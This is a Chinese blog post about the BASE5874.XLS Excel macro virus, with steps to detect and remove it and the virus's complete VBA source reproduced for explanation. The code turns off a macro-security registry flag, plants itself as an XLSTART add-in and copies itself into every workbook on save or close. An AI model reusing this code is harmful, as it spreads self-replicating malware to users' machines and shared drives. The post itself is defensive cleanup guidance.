最近頻繁地遇到了宏病毒問(wèn)題，雖然對(duì)RPA運(yùn)行的環(huán)境影響不大，也不影響軟件的正常使用，但是宏病毒的傳播速度是真的快，包括本地電腦和服務(wù)器以及公共盤(pán)都發(fā)現(xiàn)了宏病毒文件，所以特意在環(huán)境文集的第一篇來(lái)講一下宏病毒

宏病毒的常見(jiàn)狀況：關(guān)閉Excel文件，文件會(huì)自動(dòng)保存，即使未做更改也會(huì)自動(dòng)保存(其實(shí)在自動(dòng)保存的同時(shí)宏病毒代碼也會(huì)復(fù)制到其他文件進(jìn)行傳播)

檢查是否中了宏病毒并處理：

打開(kāi)Excel.exe

查看Excel的VBA代碼（Alt+F11），查看是否存在一個(gè)VBA Project(BASE5874.XLS)，如果存在就代表中了宏病毒

雙擊ThisWorkbook可以看到宏病毒的代碼

全選中后刪除代碼，保存BASE5874.XLS

打開(kāi)自己的最近打開(kāi)的其他宏文件，同樣查看VBA代碼（Alt+F11），查看VBA Project-Excel Objects下的各頁(yè)是否有宏代碼，有的話就刪除，刪除后保存文件

打開(kāi)路徑C:\Users\XXXXXX\AppData\Roaming\Microsoft\Excel\XLSTART

將其中的BASE5874.XLS文件刪除(BASE5874.XLS文件就是化身為Excel自動(dòng)加載文件并進(jìn)行傳播寫(xiě)入其他文件的)

再次打開(kāi)Excel.exe，查看代碼，發(fā)現(xiàn)無(wú)VBA Project(BASE5874.XLS)，Excel Objects - 各頁(yè)也無(wú)宏病毒代碼，即清理成功，如果依然存在則重復(fù)上述操作直至清理到不存在
下面讓我們來(lái)看一下宏病毒的代碼

宏病毒代碼：

Private Const cstrSection? ? ?As String = "Software\Microsoft\Office\8.0\Excel\Microsoft Excel"

Private Const cstrEngine? ? ? As String = "BASE5874.XLS"

Private Const cstrModule? ? ? As String = "ThisWorkbook"

Private Const cstrKeyName? ? ?As String = "Options6"

Private Const cstrVolumeData? As String = "IVID"

Private Declare Function GetVolumeInformation Lib "KERNEL32" Alias "GetVolumeInformationA" (ByVal lpRootPathName As String, ByVal lpVolumeNameBuffer As Long, ByVal nVolumeNameSize As Long, lpVolumeSerialNumber As Long, lpMaximumComponentLength As Long, lpFileSystemFlags As Long, ByVal lpFileSystemNameBuffer As Long, ByVal nFileSystemNameSize As Long) As Long

Private Declare Function RegCloseKey Lib "ADVAPI32.DLL" (ByVal hKey As Long) As Long

Private Declare Function RegOpenKeyEx Lib "ADVAPI32.DLL" Alias "RegOpenKeyExA" (ByVal hKey As Long, ByVal lpSubKey As String, ByVal ulOptions As Long, ByVal samDesired As Long, phkResult As Long) As Long

Private Declare Function RegQueryValueEx Lib "ADVAPI32.DLL" Alias "RegQueryValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal lpReserved As Long, lpType As Long, lpData As Any, lpcbData As Long) As Long

Private Declare Function RegSetValueEx Lib "ADVAPI32.DLL" Alias "RegSetValueExA" (ByVal hKey As Long, ByVal lpValueName As String, ByVal Reserved As Long, ByVal dwType As Long, lpData As Any, ByVal cbData As Long) As Long

Private WithEvents mApp As Application

Private Sub Workbook_Open()

? Dim strEngine? ? ?As String

? Dim wbkEngine? ? ?As Workbook

? Dim cmdEngine? ? ?As Object

? Dim lngRegKey? ? ?As Long

? Dim lngRegType? ? As Long

? Dim lngRegValue? ?As Long

? Dim lngVolumeID? ?As Long

? On Error Resume Next

? If (RegOpenKeyEx(&H80000001, cstrSection, 0, &H2001F, lngRegKey) = 0) Then

? ? RegQueryValueEx lngRegKey, cstrKeyName, 0, lngRegType, lngRegValue, 4

? ? RegSetValueEx lngRegKey, cstrKeyName, 0, lngRegType, lngRegValue And Not 8, 4

? ? RegCloseKey lngRegKey

? End If

? strEngine = UCase$(Application.StartupPath + "\" + cstrEngine)

? If UCase$(Me.FullName) = strEngine Then

? ? Set mApp = Application

? ElseIf Len(Dir(strEngine)) = 0 Then

? ? Application.ScreenUpdating = False

? ? If Len(Dir(Application.StartupPath, vbDirectory)) = 0 Then MkDir Application.StartupPath

? ? Set wbkEngine = Workbooks.Add

? ? wbkEngine.IsAddin = True

? ? Intrude wbkEngine

? ? GetVolumeInformation Left$(strEngine, InStr(1, strEngine, "\")), 0, 0, lngVolumeID, 0, 0, 0, 0

? ? wbkEngine.CustomDocumentProperties.Add cstrVolumeData + Hex$(lngVolumeID), False, msoPropertyTypeString, ""

? ? wbkEngine.SaveAs strEngine, xlAddIn

? ? wbkEngine.Close

? ? If (lngRegValue And 8) = 8 Then

? ? ? Set cmdEngine = Me.VBProject.VBComponents(cstrModule).CodeModule

? ? ? cmdEngine.DeleteLines 1, cmdEngine.CountOfLines

? ? ? Me.Save

? ? End If

? ? Application.ScreenUpdating = True

? Else

? ? CopyVolumesData Workbooks(cstrEngine)

? End If

End Sub

Private Sub mApp_WorkbookBeforeSave(ByVal Wb As Excel.Workbook, ByVal SaveAsUI As Boolean, Cancel As Boolean)

? On Error Resume Next

? Intrude Wb

End Sub

Private Sub mApp_WorkbookBeforeClose(ByVal Wb As Excel.Workbook, Cancel As Boolean)

? On Error Resume Next

? If Len(Wb.Path) <> 0 Then If Intrude(Wb) Then Wb.Save

End Sub

Private Function Intrude(wbkTarget As Workbook) As Boolean

? Dim cmdSource As Object

? Dim cmdTarget As Object

? On Error Resume Next

? Intrude = False

? Set cmdSource = Me.VBProject.VBComponents(cstrModule).CodeModule

? Set cmdTarget = wbkTarget.VBProject.VBComponents(cstrModule).CodeModule

? If cmdTarget.CountOfLines <= 2 Then

? ? cmdTarget.DeleteLines 1, cmdSource.CountOfLines

? ? cmdTarget.AddFromString cmdSource.Lines(1, cmdSource.CountOfLines)

? ? CopyVolumesData wbkTarget

? ? Intrude = True

? End If

End Function

Private Sub CopyVolumesData(wbkTarget As Workbook)

? Dim pptVolume As DocumentProperty

? On Error Resume Next

? For Each pptVolume In Me.CustomDocumentProperties

? ? If Left$(pptVolume.Name, Len(cstrVolumeData)) = cstrVolumeData Then

? ? ? wbkTarget.CustomDocumentProperties.Add pptVolume.Name, False, pptVolume.Type, ""

? ? ? wbkTarget.CustomDocumentProperties(pptVolume.Name).Value = pptVolume.Value

? ? End If

? Next

End Sub

代碼的內(nèi)容是通過(guò)在打開(kāi)和關(guān)閉Excel的時(shí)候把宏病毒代碼進(jìn)行傳播，如果Excel的安全等級(jí)很高，自動(dòng)加載、Marco等都被禁止的情況下，感染的幾率不大，但是為了方便開(kāi)發(fā)和運(yùn)行，我們的開(kāi)發(fā)和業(yè)務(wù)人員都啟動(dòng)了一些Excel自動(dòng)功能，所以才給了宏病毒可乘之機(jī)。

目前通過(guò)很多人的宣傳和對(duì)多個(gè)設(shè)備、公共空間的清理，宏病毒已經(jīng)很少出現(xiàn)了。